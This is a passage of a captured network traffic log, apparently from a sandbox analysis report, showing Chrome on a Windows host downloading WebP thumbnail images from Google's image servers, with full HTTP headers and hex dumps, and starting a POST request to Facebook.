                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 60480
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:30:39 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:30:39 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 1446
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC856INData Raw: 52 49 46 46 38 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 08 00 00 00 9f 01 00 ca 00 00 56 50 38 4c f0 eb 00 00 2f 9f 81 32 00 4d d0 92 6c db 6e db 60 2d 80 86 ec 75 30 ff 01 df 4b fa 99 7c 47 f4 7f 02 f8 df 7e fe 09 b6 c5 71 2e 9c e4 aa 3a ff 84 2c 2e d5 e1 32 f5 cf f0 a2 45 fa 43 ae a2 6f f0 8d 13 38 89 7e cf ff d3 eb 82 f3 83 eb 8b f3 93 0b ce 0f ae 2f 38 97 83 43 e6 d8 cd c1 21 9e 1c 10 81 cc b1 9b 83 43 e6 20 a8 64 aa 05 50 94 58 4b 94 16 30 19 0b 98 c4 dd 40 a9 33 41 bb 91 01 82 96 8a 40 d1 29 60 60 bc 6d 08 06 76 54 0d 8c 28 50 6e d2 d1 2c d5 25 e1 d6 8d 36 d4 62 06 89 75 9b 97 fb 66 aa 09 96 fb d1 ac 37 7c f2 7e 53 4f c5 8e 29 08 97 a0 d9 99 76 53 e4 7a 3f d4 eb 75 2f e9 cb 33 66 f1 cc 0f 72 ee bb 5a ee d7 2d 7d 3d f7 32 c5 77 ce 5e b8 a4 ed 86
                                                                                                                                                                                                                                Data Ascii: RIFF8WEBPVP8XVP8L/2Mln`-u0K|G~q.:,.2ECo8~/8C!C dPXK0@3A@)``mvT(Pn,%6buf7|~SO)vSz?u/3frZ-}=2w^
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 04 bd 0b da d1 3b 3c 3c 00 f9 7c e9 fc 99 9f e7 a8 71 87 c3 c2 5c d3 83 9b 5b 94 97 84 2a 42 b8 23 cf be 0c cb 96 c2 2f 0f 23 c7 f9 c1 6d 7d 6e 54 b3 91 67 fd 20 e3 a1 88 27 20 df d2 19 97 72 5a 92 69 cd c6 90 19 8a 55 82 67 45 1b 58 7a 4a 0a 5b 3c 13 74 35 73 82 07 6a e0 ea e7 7f 39 80 7c d5 a9 c8 53 6c 9e 97 b4 38 ef 37 c3 df e3 dd c6 7d 77 ba 8d 5d 76 00 12 11 fb 0f 1d 16 f6 cb 7e 91 c5 56 4d cb b0 25 f3 61 30 95 f9 71 b7 00 90 87 30 4f 85 73 66 cd 57 b9 4b b6 76 58 d1 ce 9b 47 26 00 5a e0 3e e6 46 5e 31 05 7a 42 00 00 20 bf f9 a1 30 ad 6c 53 db 04 99 f7 72 ce 39 2f 2d e3 06 15 00 f9 50 57 a3 52 d5 eb 8e 8a 6c 27 55 50 4f d5 ef bf 99 0f 73 00 a0 dc 48 d5 f4 1f 10 e8 f2 cd 61 00 b4 d1 74 35 d6 06 80 fc 46 90 73 99 4b 92 b5 5a 61 9f af 81 a8 e4 3b 20 6e
                                                                                                                                                                                                                                Data Ascii: ;<<|q\[*B#/#m}nTg ' rZiUgEXzJ[<t5sj9|Sl87}w]v~VM%a0q0OsfWKvXG&Z>F^1zB 0lSr9/-PWRl'UPOsHat5FsKZa; n
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: d6 b6 ed 69 1b 49 92 21 58 48 a6 dc 06 86 67 d2 0e 33 2d 33 33 33 1d 31 ef 0f d8 3d 62 66 66 66 66 66 e6 dd 72 5d e6 36 60 a7 b6 a4 eb aa 6d 45 ce fc 01 39 22 dc 00 40 db 36 74 6f c0 b2 a4 8c b6 bf b7 5b db 8e 49 d2 b6 6d dd b6 7d df 0f 84 32 2a b3 98 85 ee ae b6 bb cf db b6 6d fb fe ea 6f b6 6d db b6 6d 9c f6 d9 27 ab dd 5d 48 44 06 8e e3 d8 b1 ad a3 31 ee 51 71 8f fb 07 44 6a b6 6d 5b b5 1d 49 1a 73 ae 7d ce bd f7 81 64 26 93 71 30 33 97 92 99 39 7f 00 8b d9 f2 57 b2 96 2d ff 81 39 8b cc cc e8 1e 60 8e e6 6e 28 3d ba f7 9c bd a6 1e 6d db 96 4d 92 9c eb ba 9f f7 8f 88 cc ec aa 46 31 33 83 c5 b2 e5 69 07 e4 cb d3 6a 64 cd 2e e4 92 c7 de 30 33 48 6a 2c e8 cc 88 ff ff 9e 3b 1c 48 92 a4 44 89 eb 1d 0e 6b 0f f0 28 00 a0 ea b6 b5 6d 8d 31 99 a4 29 66 59 66 8a
                                                                                                                                                                                                                                Data Ascii: iI!XHg3-3331=bfffffr]6`mE9"@6to[Im}2*momm']HD1QqDjm[Is}d&q039W-9`n(=mMF13ijd.03Hj,;HDk(m1)fYf
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: a3 2b c9 48 4a c5 92 be 00 11 a9 45 3f 87 b8 a4 13 27 21 c5 f4 b7 b3 99 97 c4 1b 56 b7 b1 23 ca b6 cc b1 5d 07 9c c0 84 86 ad 11 c4 89 dc 51 97 b6 04 4a 3a 36 01 c3 8a 50 e2 44 e8 d4 41 74 e1 f4 1c f3 e6 85 45 3b 0a 35 45 60 1d 23 c8 3d 05 7c d4 40 79 1e a2 be 92 e7 c8 e3 e8 cf a9 9f 21 60 13 cf a7 ba 64 12 08 f9 8a 19 88 74 c6 8b 57 ea 02 72 cc d5 69 51 a6 41 84 da 91 4f 8e 51 c8 ce 64 84 b0 32 54 44 4a 66 53 33 82 28 b0 3d 32 11 1f de 4c ba a8 eb 1a 35 4a ac 92 a5 3e 48 b9 d8 65 ca 44 d6 65 ca 86 04 4a 5a 95 c3 d4 17 8e 80 54 e3 f4 4e 42 01 4f 47 2e 3b 5f 2a 9e 3a ed 17 df b2 f0 f4 f3 ba c6 08 40 5f 2c dc ac 7c fc 3b f5 bc 43 c6 68 c1 6a 3c 70 0f 5f b3 de f7 c2 d5 f8 d6 c9 75 a9 2f f9 f3 7c 7d 92 d9 86 d9 1a 57 9c b4 2a e9 f4 a4 88 4c f6 78 d9 7a cb 8a
                                                                                                                                                                                                                                Data Ascii: +HJE?'!V#]QJ:6PDAtE;5E`#=|@y!`dtWriQAOQd2TDJfS3(=2L5J>HeDeJZTNBOG.;_*:@_,|;Chj<p_u/|}W*Lxz
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: ae bd 8f a2 0b a9 81 94 d9 51 4a 18 ee 6c df 1b 0f 0f 71 75 a8 65 48 1b 7b 16 38 82 44 e2 e4 a8 58 fb e7 14 c5 36 68 a2 2b af aa 71 14 1a eb 66 13 c5 30 51 02 47 84 2b 20 25 c6 98 4f 3f 0f 79 fc fd 0f fb 96 5e 18 83 ee 05 ef bc 86 55 d7 fc dc b8 69 f3 36 33 00 87 87 a7 3f 76 39 9a 7d a8 9c ab 8d 19 60 9c ff a1 87 6b da b5 a9 3b 27 d3 96 8c 18 f6 d4 a9 14 72 b4 37 8d 13 e9 89 17 d7 82 d0 34 ad 54 b6 e1 5c e2 6c 1a c0 0c 7b 33 bf cf 65 cc b1 da 79 85 eb fa 64 c4 f0 58 0f 10 11 65 26 63 54 a1 5e 23 a1 61 66 0a a7 3d 5d 28 13 d1 b8 73 8a 1d d9 94 99 47 2d 69 1f 79 f9 f5 f9 f9 e7 e6 83 50 fe 4a e1 7a 6f 79 eb ab be 77 fe 0f 88 08 ba f7 f7 97 be f9 f0 0b 36 3d ff cd 7b e6 df 20 af 87 05 02 83 f9 c1 4b 8e 7e e9 d4 e3 2f d4 b6 d9 59 14 d2 15 7d 36 8e e4 0e dc 1e
                                                                                                                                                                                                                                Data Ascii: QJlqueH{8DX6h+qf0QG+ %O?y^Ui63?v9}`k;'r74T\l{3eydXe&cT^#af=](sG-iyPJzoyw6={ K~/Y}6
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 48 d5 69 f8 7c f7 fd e2 e1 5f bb 8e 24 ff dd 8d 1d 19 ce 05 bd 73 9d a5 16 d7 27 17 bf e0 d9 87 3d f7 3b 0f b7 fc d2 3b c6 5f 3b 83 89 40 b2 84 02 33 b2 7f 37 ee fc 6b e6 7f e5 71 e1 03 9e 2b 3d b3 85 1b 06 4c 75 1f 32 09 e0 f5 4f 26 0d 35 77 a8 91 ef ff cc e0 6b 67 61 51 6b b6 6d 84 a4 67 a5 bb e7 fe 97 ae 23 87 b3 e5 8b 3f 3d 70 e2 80 e9 df 5f f9 2d a7 0b bf eb a8 bd 2c 9d 33 44 57 20 00 3d 7e 52 d4 74 cc ee da f7 e7 db ff b7 0f f7 7f da 93 7d 3a 60 52 c4 6a d7 bf 78 2c fa c3 cb ca c7 ee 57 bf fb a1 21 2c a0 46 33 bb db c1 d3 1d 7d 8f 63 e8 e3 9e f6 df 73 a0 24 f9 c4 fb b8 ff 0b ce 5d 5f f9 7c e1 b1 c6 df 52 3c c1 b2 fb 29 18 d3 0b 76 7e 88 e5 ff 32 2c ff f2 37 9f b9 3a c1 6b db ec 7c 4a 6d cb 57 de 95 3f ee c8 ef a6 86 dd cb 66 c3 6a 2a 77 9b 7a cb d0
                                                                                                                                                                                                                                Data Ascii: Hi|_$s'=;;_;@37kq+=Lu2O&5wkgaQkmg#?=p_-,3DW =~Rt}:`Rjx,W!,F3}cs$]_|R<)v~2,7:k|JmW?fj*wz
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 4b f6 81 2a 20 03 10 1f e3 65 37 6a a4 28 96 ab ed 3f 67 40 1e fd e4 2d 9d 1e b3 a7 a3 48 40 06 1f f8 a2 b9 f0 af 1f 62 9c a1 37 8d 46 ab 45 0b 2f a2 e6 51 5f d0 bb ca 05 53 23 7f 42 f8 f7 43 64 4a 4c 41 f7 d6 fc d7 b5 7f 3d 02 5e b1 f6 f5 05 66 bb 27 10 e3 be 0d 4d 95 1a f3 94 4d 97 a1 43 2c 3c 3c 42 7b 3f f8 c9 e8 89 ea 3e 52 12 02 c3 f4 b5 ef da 92 db 45 1e 3a 8a 89 be 72 50 00 73 6d ca ad b4 af 24 f1 b9 0d a6 0a f3 5d 5e c2 fb f8 28 45 fe 3b 7d 30 c4 7b c9 52 83 f9 6c 15 ca 9e ed d5 b7 2a 9f 8c 22 19 21 47 ff 91 0d 37 8a 6c 5d c7 d4 88 aa f7 63 ba d9 c2 6b b9 9b 5d 1c 83 c7 cb c9 54 ce 64 bf 49 c8 16 9c 9d a0 de 8d 57 77 df 96 df 79 3c c9 0d 14 f8 34 47 f0 2d c6 70 d1 5c 89 a6 06 b3 b5 0a b9 d7 ec 1f 47 f5 91 86 5b 23 ad f2 5d cf 79 21 d8 16 da 53 8c
                                                                                                                                                                                                                                Data Ascii: K* e7j(?g@-H@b7FE/Q_S#BCdJLA=^f'MMC,<<B{?>RE:rPsm$]^(E;}0{Rl*"!G7l]ck]TdIWwy<4G-p\G[#]y!S
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: c1 74 9f 84 73 d5 12 1a ac 51 45 11 81 58 76 70 74 08 70 11 42 d3 b0 94 ec 5f c3 80 a5 58 51 47 1d 13 2a 23 8d aa 1e c0 fb fb c6 89 32 14 e6 ab 36 d9 af 77 dd 93 a2 42 1a 0c 04 2d 2d 93 7a 5b d7 5a 25 0b d0 80 06 45 25 38 b8 17 d1 18 2c ba 08 cd 60 a3 75 10 39 74 b8 78 a4 08 00 4c 82 7a 7a 3e b4 20 2a c9 b1 a5 1f 80 4d 54 0d 6e c6 cd 99 35 83 d4 61 ae 62 b1 0d 94 58 7d b6 fc c6 89 e3 e1 00 b5 c9 0c 35 05 98 b1 d9 4e ec 53 23 06 f8 cd 38 28 42 81 90 b7 f3 34 0b 29 70 3e 3d 68 1a 16 27 80 30 51 b0 44 01 45 fa 64 3c 44 00 66 f3 92 fa b2 49 4d 27 46 a2 65 0a 38 d4 e5 09 25 a8 5d dd 2d 8d 7c f8 70 0e d9 ce 0d 71 3f 4b 78 8e 57 d0 c0 54 80 a0 b0 c3 2c 5b 69 22 c9 8e 1d 48 a8 8f ed 91 a5 2c b8 fc 82 37 30 cc 02 8c f8 25 2d 69 39 c0 4a d2 14 eb d7 49 24 a2 ff 47
                                                                                                                                                                                                                                Data Ascii: tsQEXvptpB_XQG*#26wB--z[Z%E%8,`u9txLzz> *MTn5abX}5NS#8(B4)p>=h'0QDEd<DfIM'Fe8%]-|pq?KxWT,[i"H,70%-i9JI$G
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 9a 15 ff ac 14 61 81 d1 58 f4 a7 55 0a fb c5 a8 61 9f 3e db 8f 06 f4 b0 8a a4 06 20 a8 51 b9 d3 fd 0c eb d7 cd 93 6e 6a 99 91 97 39 ef b0 0d 27 32 aa ec 20 c0 21 c5 06 92 9a d2 49 a5 cf 8d c9 60 b8 0c b5 ae 6f d3 0e a5 86 05 cd 77 cf f7 16 2d bc 37 c6 e6 68 6d 80 bb 1f c8 d3 41 73 de 7b 72 da 99 3e cd 3d 7a 35 10 d1 19 56 dc 82 d0 a6 65 b2 5c e5 45 ef 58 b1 c5 97 ca a1 86 52 7e 65 f7 6b d4 c8 e8 af e3 68 fb 58 c2 4e 4e 64 9c 85 24 cc 66 c8 98 4b 2f e6 94 63 7e 2f 4b ab 55 6f 12 c5 29 3d e8 d1 1f b9 4b df c4 b6 a1 e7 38 8d 3b 39 0c 9f c5 24 6c 8d 5d d9 5c 32 c5 7b fc 7b 96 2c ae f7 0c 51 8e b8 ba 6f 48 eb 9b 86 a1 74 b4 f5 86 01 a9 e2 0c b4 ff 26 62 68 33 a7 a1 e4 cf 12 60 03 7d 34 63 dc fd f4 1b 2f ac ff 87 dc ab af 6e 14 49 76 14 76 ec d1 de ca 8b ef 36
                                                                                                                                                                                                                                Data Ascii: aXUa> Qnj9'2 !I`ow-7hmAs{r>=z5Ve\EXR~ekhXNNd$fK/c~/KUo)=K8;9$l]\2{{,QoHt&bh3`}4c/nIvv6
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 37 96 59 96 71 27 dd b3 79 df 7a 11 71 d3 13 9d 66 fb 2e c8 f2 f0 50 0d 00 1e 3c 78 30 5e 60 3c f2 dd 71 fe fa 9d d6 fe ba 0f fb 7f bb 58 7e f6 c7 df fd 99 5f ff e6 ea f6 ee 77 6b e1 76 b5 f5 51 51 53 05 01 d7 6a a3 a4 a0 39 94 55 22 01 35 07 59 04 a0 e0 45 7a 3e c2 eb 92 a2 38 e5 89 e9 b8 91 f7 da 4d 68 fb d6 93 9b 46 b7 2a 5b df 6f 5e bd f2 4f eb 4c e0 a5 74 1f ee d3 7b dd ff 5d f9 06 d7 57 c6 2c 34 af ef bc 54 7c f1 ee 27 78 f9 e7 f1 c9 f7 01 cf 5d bf fb ea f9 15 3b 78 f1 79 38 7e fe cb be fc f5 f6 00 c7 ee af e4 cc f7 25 d3 74 d2 26 82 a0 81 1f 28 2a 0d 18 14 2b ae 18 a1 b7 eb 96 b3 4f 8d ec 15 ef b3 6a 67 e1 72 bb a8 73 9a 45 63 57 29 05 2d ee d3 94 84 24 28 69 ca 72 06 4e d5 17 16 3b 81 32 2a 82 5e ca 41 88 22 68 14 be fc a4 26 24 0a e0 f7 8e bd 0b
                                                                                                                                                                                                                                Data Ascii: 7Yq'yzqf.P<x0^`<qX~_wkvQQSj9U"5YEz>8MhF*[o^OLt{]W,4T|'x];xy8~%t&(*+OjgrsEcW)-$(irN;2*^A"h&$


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                119192.168.2.450015216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC524OUTGET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 536
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:30:39 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:30:39 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 1446
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC536INData Raw: 52 49 46 46 10 02 00 00 57 45 42 50 56 50 38 4c 03 02 00 00 2f 3f c0 0f 00 df e3 36 b6 6d 55 d9 f7 bd 87 bb 53 01 65 58 ff f9 cf a8 80 c8 f5 dd 7b da 70 1b db b6 aa ac ef 9a 91 6b 46 ff 31 15 d0 01 a9 74 e0 7a dc c4 b6 ed 2a e7 fc 1c 3a 24 e4 a8 03 07 88 42 18 3a 18 3a ca 0f d5 0f bc bb e7 3f 14 da f9 0a 56 94 ea b5 43 d1 83 35 0c 86 11 11 f9 53 16 0a f0 07 a4 32 e7 bf 2f 99 00 bf 5d c1 ac c0 4c 0f 66 6c e8 06 39 23 c8 b5 2f 86 5c fc 27 08 ad e5 41 f3 b4 f7 58 30 e6 92 df 2d 17 50 f3 27 98 3c 0a 69 9b b3 c2 28 e4 7c 80 47 fe ff 85 48 9a df 00 97 a4 3e 49 32 a5 28 64 99 4b 03 17 02 42 a8 49 14 08 44 ac b0 2a 09 d0 67 2d 17 99 c2 6e 19 39 28 16 20 f8 e6 cf c1 e1 73 4a 3e 01 05 fc 8f a7 90 13 14 54 10 21 22 72 13 5e 09 41 96 8b 27 23 82 34 0d 00 2b f0 49 10
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/?6mUSeX{pkF1tz*:$B::?VC5S2/]Lfl9#/\'AX0-P'<i(|GH>I2(dKBID*g-n9( sJ>T!"r^A'#4+I


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                120192.168.2.450016216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC524OUTGET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 326
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:45 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:54:45 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC326INData Raw: 52 49 46 46 3e 01 00 00 57 45 42 50 56 50 38 4c 31 01 00 00 2f 3f c0 0f 00 85 5c 5b db 8e 3d 7a ce 2a 2b 7d 8e c2 e9 54 a7 b6 9d d2 b6 6d db b6 6d 6b 3c 73 15 df fb 7e ff 7c ef 18 45 44 ff 27 40 fe 33 d8 58 dd a0 0b a9 ab 4d 51 25 d7 d6 a6 eb 42 eb ea c2 1d 01 74 cd b0 ae 5a 03 5a 34 43 30 62 4a 3d 2c ab 96 00 86 54 7d 30 f8 8d 30 f3 cd b1 f6 4d d5 1d 02 7b df 52 8b ec 01 67 df 50 ab c8 1a 70 23 bd df 90 cc 00 37 03 06 55 ba 26 43 28 1d bb be 51 5e bf 7c 05 69 31 c3 b6 6b 52 61 da 86 6a 1d ba 54 92 09 8c 3a 12 1b 61 3b 2a 58 15 14 15 ed a9 91 80 a8 68 7f 47 7e ff bf b9 7f a3 2b 79 7e 1a 55 55 3e 3f 9c e8 2e 1f 9e 33 1c 01 74 8d b0 a2 6a 03 5a 54 43 40 89 29 f5 b0 ac 6a 05 f0 b0 f8 01 14 7d 23 97 96 87 6f 89 62 91 26 be 9d 07 40 dc 81 fb 6f 65 62 09 d6 0e
                                                                                                                                                                                                                                Data Ascii: RIFF>WEBPVP8L1/?\[=z*+}Tmmk<s~|ED'@3XMQ%BtZZ4C0bJ=,T}00M{RgPp#7U&C(Q^|i1kRajT:a;*XhG~+y~UU>?.3tjZTC@)j}#ob&@oeb


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                121192.168.2.450017216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC523OUTGET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 686
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:48:32 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:48:32 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 3973
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC686INData Raw: 52 49 46 46 a6 02 00 00 57 45 42 50 56 50 38 4c 99 02 00 00 2f 3f c0 0f 00 05 25 6a db 0c 49 d6 3f c6 d2 5c 71 65 db f6 b5 6d db b6 6d fb de b1 6d db b6 da b6 f5 2e fe 88 c8 88 bc ab d9 45 f4 7f 02 e4 f2 f6 d4 67 de 7a fb cd 7b ba fe 3f 7a cf 38 5e 88 3d 73 d7 e7 71 fb 26 85 e8 47 ee 89 d1 1b c5 f8 bd 30 26 2e 87 f1 3f 3f 16 6d 0a 31 67 6e fe ee a1 81 22 32 e5 a5 ff 0e 94 9b 38 1d 83 76 e5 18 57 75 17 f7 c7 0e 1b 48 0b 57 8c de 2c 1e 87 25 28 2e 86 3a 8d 7e 5a fc ce 50 ac 0b f3 0d 7a ac f8 7e 4f f1 68 90 1a 75 97 f8 ff 46 15 86 58 0a 30 47 42 ee 06 f8 33 40 0d 90 2b 8e 0f ac 3a 9b 91 95 76 62 f1 35 0e 52 09 94 fa fb 01 e0 2d db 2b b9 d8 53 ee b2 fd 01 f0 91 b7 f3 40 81 58 77 e2 3e cb 22 55 c0 09 6f 00 f3 2d c7 89 3a c3 b2 0e c0 d7 07 6a 80 69 31 c6 b3 1b
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/?%jI?\qemmm.Egz{?z8^=sq&G0&.??m1gn"28vWuHW,%(.:~ZPz~OhuFX0GB3@+:vb5R-+S@Xw>"Uo-:ji1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                122192.168.2.450027157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC849OUTPOST /ajax/webstorage/process_keys/?state=1 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 551
                                                                                                                                                                                                                                X-FB-LSD: AVrwfIkMup0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                X-ASBD-ID: 129477
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
